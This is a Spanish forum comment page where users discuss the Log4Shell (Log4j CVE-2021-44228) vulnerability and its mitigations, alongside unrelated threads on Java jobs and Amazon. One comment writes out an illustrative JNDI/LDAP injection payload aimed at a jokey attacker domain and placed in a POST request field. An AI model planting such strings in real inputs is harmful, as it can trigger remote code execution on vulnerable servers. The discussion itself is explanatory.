alvdavi

CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones] [55]

1. #51 nodanero

   #48 Gracias por la explicación. Ya veo que en este caso se esta utilizando LDAP y para eso se necesita un servidor en remoto. Veo que hay otros como HTTP, RMI, DNS y BeanFactory, me intriga saber hasta que punto se podria explotar JNDI XBean pero no soy desarrollador y es mas bien curiosidad, asi que me esperare a ver como se va la cosa.

   0 K 6

1. #48 alvdavi

   #45 para añadir más detalle, aunque es muy cómodo montar un servidor ldap que genere comandos dinámicos, tiene el inconveniente (o más bien ventaja para el pobre que está intentando paliar el problema)de dejar un rastro claro en el log de los comandos que se ejecutaron

   0 K 6

1. #42 nodanero

   #40 Claro. unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
   
   Aqui muestran en el ejemplo, alguna peticion del escaneo masivo. Estas peticiones llevan un User-Agent modificado en el que esta embebido un comando (curl,wget,bash).
   Lo que yo entiendo es que esa peticion podria llevar cualquier otro User-Agent con el comando que el atacante quisiera, como el del ejemplo que puse al principio. Se podria pasar una payload a base de peticiones HTTP sin tener que conectarse a un servidor remoto para descargar (a diferencia del ejemplo de Palo Alto).

   0 K 6

1. #37 nodanero *

   #34 No. Puedes ver el ejemplo en la web de Palo Alto, donde muestran la peticion al servidor, y el comando incluido en ella. En ese ejemplo enseñan concatenado "curl", "wget", "bash" pero podria haber sido cualquier otro.

   1 K 9

1. #33 pendejo1983

   #31 gracias

   0 K 9

1. #29 pendejo1983

   #27 pero la arranca Apache Tomcat, no? Pensaba que sería algo a modificar en algún fichero de configuración

   0 K 9

1. #28 infestissumam

   #16 #26  A eso me refería, si. Parece que este parche solo sirve para versiones superiores a JDK 1.8, nosotros tenemos JDK 1.7 en algunos servidores y log4j 1.15 no es compatible con JDK 1.7

   1 K 23

1. #25 --59291--

   #21 cierto, gracias por el aporte.
   
   la solución en #8 es para versiones de log4j entre 2.10 y 2.14.

   1 K 3

Log4Shell es la vulnerabilidad crítica 'de proporciones catastróficas' que amenaza con destrozar internet [52]

1. #34 Hil014 *

   #24 eso o deshabilitar la la ejecución desde jdni con la variable "log4j2.formatMsgNoLookups=true"
   
   O desactivar jdni directamente

   1 K 0

Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en) [79]

1. #55 --94561--

   #54 Que la movida es que te pueden mandar una peticion en la que figure ese texto asi formado, no?
   
   "${jndi:ldap://jaja.equisde.tevoyapetarelkakas.com/miraquerisas}"
   
   Para que el jodio log4j se lo coma
   
   Ejemplo:
   
   POST mipagina.com/user
   
   A la que se le pasa de body
   
   { "user": "${jndi:ldap://jaja.equisde.tevoyapetarelkakas.com/miraquerisas}", email="ostiatu@tetemail.com"}
   
   Y como se te ocurra logear el user estas jodido....
   
   BOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM

   1 K 20

¿Con qué frecuencia las personas copian y pegan desde Stack Overflow? [en] [70]

1. #58 --352114--

   #17 que esos lenguajes son populares y tienen mucho gancho.
   Los que somos rudos reinventamos la rueda en java o C, cada vez que hay que hacer una nueva aplicación.

   0 K 6

1. #54 EmuAGR

   #52 Cuarta: La mayoría de trabajos en Java son para cárnicas que buscan un picacódigos temporales para mantener la aplicación hecha en 2008 para X cliente.
   
   Porque al menos aquí en España no hacen aplicaciones punteras en Android. Ni ningún videojuego exitoso de móvil.
   
   Pocas aplicaciones de escritorio que funcionen bien en Java, algún IDE.

   0 K 10

1. #24 llorencs

   #17 Un compañero de trabajo ha hecho un fp y lo hizo en Java. Por referencias otra persona había hecho cursos de Java. Si, aún se enseña. En la educación reglada se va a lenguajes con tipados estáticos.

   0 K 10

1. #23 --526993--

   »  ver comentario

Amazon llevará hasta el final la batalla contra su primer sindicato en EEUU [66]

1. #64 SergioZgz

   #63 en España? Yo hablo de hace bastantes años (tampoco una burrada que no estaban aquí) y de hace menos años por parte de conocidos, pero me alegro que la cosa esté bien de últimos años hacía ahora que es lo que hace falta.
   
   En aquella época tenía 2 amigos en usa y era como la noche y el dia

   0 K 10